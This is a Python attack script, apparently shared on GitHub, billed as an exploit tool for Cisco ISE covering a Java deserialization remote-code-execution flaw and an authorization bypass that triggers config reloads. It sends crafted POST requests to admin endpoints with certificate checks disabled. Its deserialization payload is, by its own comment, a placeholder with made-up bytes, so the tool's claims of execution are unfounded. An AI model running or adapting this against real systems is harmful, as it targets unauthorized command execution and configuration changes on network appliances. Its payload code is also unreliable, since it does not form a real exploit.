#!/usr/bin/env python3
"""
Elaina Core – Cisco ISE Exploit Tool
Supports CVE‑2025‑20124 (Java deserialization RCE)
         CVE‑2025‑20125 (Authorization bypass – config/read/reboot)
Author: Yuri08
GitHub: github.com/Yuri08loveElaina
"""

import requests
import sys
import argparse
import base64
import urllib3
urllib3.disable_warnings()

def banner():
    print(r"""
  ____ _      _            ____ ___ ___ ___  
 / ___(_)_ __(_) ___ ___  / ___|_ _/ __/ _ \ 
| |   | | '__| |/ __/ _ \| |    | | (_| (_) |
| |___| | |  | | (_|  __/| |___ | |\___\___/ 
 \____|_|_|  |_|\___\___| \____|___|          
                                           
Elaina Core – Cisco ISE RCE/BYOP Exploit
CVE‑2025‑20124 / CVE‑2025‑20125
Coder: Yuri08 | github.com/Yuri08loveElaina
""")

def build_serialize_payload(cmd):
    # Placeholder Java serialization: real exploit cần gadget chain
    java_cmd = cmd.replace('"', '\\"')
    payload = f'\xac\xed\x00\x05sr\x00...ExecGadget...execute("{java_cmd}")'
    return base64.b64encode(payload.encode()).decode()

def exploit_deserialization(base_url, session_token, cmd):
    endpoint = f"{base_url}/api/v1/admin/deserializer"
    headers = {"Cookie": f"ISESSIONID={session_token}"}
    payload = build_serialize_payload(cmd)
    data = {"object": payload}
    
    print(f"[+] CVE-20124: Sending deserialization payload to {endpoint}")
    r = requests.post(endpoint, json=data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[+] Payload possibly executed!")
    else:
        print(f"[-] Unexpected response: {r.status_code}")

def exploit_auth_bypass(base_url, session_token):
    endpoint = f"{base_url}/api/v1/admin/reload"
    headers = {"Cookie": f"ISESSIONID={session_token}"}
    
    print(f"[+] CVE-20125: Sending config reload request to {endpoint}")
    r = requests.post(endpoint, headers=headers, verify=False)
    if r.status_code in (200,204):
        print("[+] Reload/config change accepted!")
    else:
        print(f"[-] Bypass failed: {r.status_code}")

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True, help="Base URL of Cisco ISE appliance")
    parser.add_argument("--session", required=True, help="Authenticated ISE session token")
    parser.add_argument("--cmd", help="Command to execute via deserialization")
    parser.add_argument("--deser", action="store_true", help="Run CVE‑20124 exploit")
    parser.add_argument("--bypass", action="store_true", help="Run CVE‑20125 bypass")
    args = parser.parse_args()

    banner()
    if args.deser and args.cmd:
        exploit_deserialization(args.url, args.session, args.cmd)
    if args.bypass:
        exploit_auth_bypass(args.url, args.session)
    if not args.deser and not args.bypass:
        print("[-] Specify at least --deser or --bypass.")
        sys.exit(1)

if __name__ == "__main__":
    main()